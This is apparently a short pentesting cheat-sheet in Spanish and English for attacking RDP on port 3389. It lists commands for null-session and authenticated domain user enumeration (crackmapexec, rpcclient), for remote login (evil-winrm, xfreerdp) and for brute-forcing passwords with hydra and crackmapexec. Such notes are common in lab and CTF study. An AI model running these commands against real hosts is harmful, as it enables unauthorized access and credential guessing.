3389 - RDP
El Protocolo de Escritorio Remoto es un protocolo utilizado para establecer sesiones gráficas remotas a través de la red.
Enumeration
Without Credentials
crackmapexec rdp <IP>rpcclient -U "" <DC_IP> -NWith Credentials
Domain Users
rpcclient -U "deimcorp.local\champi%Password2" <AD_IP> -c "enumdomusers"No tiene por que ser Usuario Administrador del dominio o similar
Conecction
evil-winrm -i <IP> -u <USER> -p <PASSWD> -SLa flag -S, es por si el SSL esta activado (se puede quitar)
xfreerdp /v:<IP> /u:<USER> /p:<PASSWD>Brute Force
hydra -V -f -L users.txt -P passwords.txt rdp ://<IP>crackmapexec rdp <IP> -u users.txt -p passwords.txt --continue-on-successLast updated